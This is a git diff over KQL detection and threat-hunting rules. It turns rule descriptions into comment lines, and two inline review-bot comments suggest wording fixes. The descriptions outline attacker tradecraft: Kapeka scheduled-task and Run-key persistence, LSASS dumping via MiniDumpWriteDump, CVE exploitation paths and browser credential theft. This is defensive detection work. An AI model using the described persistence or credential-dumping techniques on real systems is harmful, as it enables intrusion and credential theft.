 // Tags: attack.persistence, cve.2024-1708, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql b/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql
index 39e87097..6e7e53bd 100644
--- a/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql
+++ b/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql
@@ -3,8 +3,7 @@
 // Date: 2024-07-03
 // Level: medium
 // Description: Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key.
-The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
-
+// The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1553.003, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql
index fa83fb64..3d759b47 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql
@@ -3,7 +3,6 @@
 // Date: 2023-05-02
 // Level: high
 // Description: Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism
-
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
index 9b762bed..6fbff8d4 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
@@ -3,8 +3,7 @@
 // Date: 2024-03-22
 // Level: medium
 // Description: Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command.
-This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
-
+// This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql b/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql
index bd5277d2..606fce61 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql
@@ -3,9 +3,8 @@
 // Date: 2025-06-26
 // Level: high
 // Description: Detects potential exploitation of CVE-2025-49144, a local privilege escalation vulnerability in Notepad++ installers (v8.8.1 and prior) where the installer calls regsvr32.exe without specifying the full path.
-This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer.
-The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++.
-
+// This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer.
+// The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.008, cve.2025-49144, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql b/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
index b130f579..63cba99d 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
@@ -3,8 +3,7 @@
 // Date: 2024-07-31
 // Level: low
 // Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024.
-Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
-
+// Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.t1112, attack.defense-evasion, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql b/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql
index e06e18c0..d5c956e7 100644
--- a/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql
+++ b/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql
@@ -3,8 +3,7 @@
 // Date: 2024-02-21
 // Level: medium
 // Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
-This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
-
+// This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, cve.2024-1709, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql b/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql
index 23849038..d403c1fd 100644
--- a/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql
+++ b/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql
@@ -3,7 +3,6 @@
 // Date: 2025-04-17
 // Level: high
 // Description: Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406)
-
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.execution, attack.t1059.003, attack.t1505.003, cve.2025-30406, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql b/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql
index f8a299e5..91935847 100644
--- a/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql
+++ b/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql
@@ -3,7 +3,6 @@
 // Date: 2021-06-29
 // Level: informational
 // Description: Detect DLL Load from Spooler Service backup folder. This behavior has been observed during the exploitation of the Print Spooler Vulnerability CVE-2021-1675 and CVE-2021-34527 (PrinterNightmare).
-
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, cve.2021-34527, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql b/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
index 4093e401..ddea3ae3 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
@@ -3,8 +3,7 @@
 // Date: 2025-10-20
 // Level: medium
 // Description: Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password.
-This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.
-
+// This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078.001, detection.emerging-threats, cve.2025-57788
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql
index b8420249..cf85ad6d 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql
@@ -3,8 +3,7 @@
 // Date: 2024-04-23
 // Level: high
 // Description: Detects the setting of a custom protocol handler with the name "rogue".
-Seen being created by Forest Blizzard APT as reported by MSFT.
-
+// Seen being created by Forest Blizzard APT as reported by MSFT.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql
index 18a4b420..5a9afe86 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql
@@ -3,8 +3,7 @@
 // Date: 2024-04-23
 // Level: high
 // Description: Detects the setting of the DLL that handles the custom protocol handler.
-Seen being created by Forest Blizzard APT as reported by MSFT.
-
+// Seen being created by Forest Blizzard APT as reported by MSFT.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql
index d91c5c3f..69a250e6 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql
@@ -3,8 +3,7 @@
 // Date: 2023-08-07
 // Level: high
 // Description: Detects the execution of installed GuLoader malware on the host.
-GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.
-
+// GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql
index be69d3b9..938fdaf6 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql
@@ -3,11 +3,10 @@
 // Date: 2024-07-03
 // Level: high
 // Description: Detects Kapeka backdoor persistence activity.
-Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not).
-For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM.
-To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command.
-Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
-
+// Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not).
+// For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM.
+// To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command.
+// Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql b/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
index 3470acc4..af3d2ddb 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2024-12-19
 // Level: high
 // Description: Detects the execution of more.com and vbc.exe in the process tree.
-This behavior was observed by a set of samples related to Lummac Stealer.
-The Lummac payload is injected into the vbc.exe process.
-
+// This behavior was observed by a set of samples related to Lummac Stealer.
+// The Lummac payload is injected into the vbc.exe process.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql b/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
index f2124a96..8e7dbbd1 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
@@ -3,10 +3,9 @@
 // Date: 2025-10-02
 // Level: high
 // Description: Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463.
-This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations.
-When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment,
-potentially leading to arbitrary code execution and privilege escalation.
-
+// This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations.
+// When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment,
+// potentially leading to arbitrary code execution and privilege escalation.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.t1068, cve.2025-32463, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql
index 59154956..fb0d5662 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql
@@ -3,7 +3,6 @@
 // Date: 2025-02-19
 // Level: medium
 // Description: Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250.
-
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.t1068, cve.2024-35250, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql
index 869374b7..da562f22 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql
@@ -3,7 +3,6 @@
 // Date: 2024-03-22
 // Level: high
 // Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
-
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql
index 7365fe39..793e6168 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql
@@ -3,8 +3,7 @@
 // Date: 2023-10-27
 // Level: high
 // Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries.
-The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
-
+// The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql b/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql
index 8ccccbdf..147394fd 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql
@@ -3,9 +3,8 @@
 // Date: 2022-03-21
 // Level: high
 // Description: Detects post exploitation execution technique of the Serpent backdoor.
-According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method.
-It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
-
+// According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method.
+// It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.006, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql b/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql
index 19069e8a..549dd621 100644
--- a/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql
+++ b/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql
@@ -3,11 +3,10 @@
 // Date: 2024-07-30
 // Level: medium
 // Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout).
-The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands.
-It can also be used in shell scripts that may require clipboard content as input.
-Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information.
-Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
-
+// The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands.
+// It can also be used in shell scripts that may require clipboard content as input.
+// Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information.
+// Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
 // MITRE Tactic: Collection
 // Tags: attack.collection, attack.credential-access, attack.t1115, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql b/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql
index 9b144aaf..20b4ab4f 100644
--- a/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql
+++ b/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql
@@ -3,9 +3,8 @@
 // Date: 2024-05-31
 // Level: medium
 // Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder.
-Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone.
-Use this rule to hunt for potential suspicious or uncommon activity in your environement.
-
+// Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone.
+// Use this rule to hunt for potential suspicious or uncommon activity in your environement.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql b/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql
index 6c9bee4a..b93ca019 100644
--- a/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql
+++ b/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql
@@ -3,8 +3,7 @@
 // Date: 2024-11-07
 // Level: medium
 // Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2)
-that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
-
+// that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1102.002, attack.t1090.004, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql b/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
index a50c4793..d890d718 100644
--- a/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
+++ b/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
@@ -3,22 +3,14 @@
 // Date: 2023-04-13
 // Level: medium
 // Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session.
-
-Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries.
-Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed.
-
-Hunting Opportunity 1- Weed Out The Noise
-
-When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1":
-
-ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0"
-
-After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences.
-
-Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours
-
-If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
-
+// Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries.
+// Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed.
+// Hunting Opportunity 1- Weed Out The Noise
+// When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1":
+// ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0"
+// After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences.
+// Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours
+// If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql
index 68980619..41c8032f 100644
--- a/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql
+++ b/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql
@@ -3,7 +3,6 @@
 // Date: 2023-10-25
 // Level: medium
 // Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel
-
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql
index 34fbdd94..e03e9d3c 100644
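Review bot: The second added comment line still ends in `and then points that the agent is installed`, which is not a sentence, and this hunk is the moment to fix it since the text now becomes the rule header: `// Through the web interface of Action1, the administrator must create a new policy or an app to establish remote execution and then target the endpoints on which the agent is installed.`. The two "Hunting Opportunity" paragraphs describe analysis steps (splitting the policy name out of `schedule:Deploy_App__<name>_<id>` and filtering remote sessions by time of day) but do not say whether the query below implements either or leaves them to the analyst; one sentence stating that would keep the header honest, and I cannot verify it because the query body is outside this hunk. Consider also keeping an empty `//` line before each "Hunting Opportunity" heading, since dropping the blank lines collapses the two sections into one paragraph.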
--- a/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql
+++ b/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql
@@ -3,9 +3,8 @@
 // Date: 2022-04-09
 // Level: low
 // Description: Detects file access requests to browser credential stores by uncommon processes.
-Could indicate potential attempt of credential stealing.
-Requires heavy baselining before usage
-
+// Could indicate potential attempt of credential stealing.
+// Requires heavy baselining before usage
 // MITRE Tactic: Credential Access
 // Tags: attack.t1003, attack.credential-access, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
index e84184c5..838ce0d9 100644
--- a/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
+++ b/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
@@ -3,8 +3,7 @@
 // Date: 2024-07-29
 // Level: low
 // Description: Detects file access requests to chromium based browser sensitive files by uncommon processes.
-Could indicate potential attempt of stealing sensitive information.
-
+// Could indicate potential attempt of stealing sensitive information.
 // MITRE Tactic: Credential Access
 // Tags: attack.t1003, attack.credential-access, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql b/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
index c1c3f7b3..cf376a66 100644
--- a/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
+++ b/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
@@ -3,10 +3,9 @@
 // Date: 2019-10-27
 // Level: medium
 // Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process.
-The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.
-As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
-Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
-
+// The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.
+// As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
+// Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1003.001, detection.threat-hunting
 // False Positives:
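Review bot: `SilentTrynity C2 Framework` on the second added comment line looks like a misspelling of SILENTTRINITY, the .NET post-exploitation framework whose LSASS-dump module this sentence is describing; I am inferring the intended name from context, so please confirm before changing it to `// As an example, the SILENTTRINITY C2 framework has a module that leverages this API to dump the contents of lsass.exe and transfer it over the network back to the attacker's machine.`. The header already names ProcessHacker and Task Manager as legitimate MiniDumpWriteDump callers; a line such as `// Expect WerFault.exe, taskmgr.exe and debugger tooling to load these DLLs routinely; baseline before alerting on this hunt.` would tell the analyst what to tune, though whether the query below already excludes them cannot be seen from this hunk.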
diff --git a/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql b/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql
index f3c4df7a..a0066c20 100644
--- a/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql
+++ b/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql
@@ -3,7 +3,6 @@
 // Date: 2023-11-20
 // Level: medium
 // Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
-
 // MITRE Tactic: Credential Access
 // Tags: attack.t1552, attack.credential-access, detection.threat-hunting
 // False Positives:
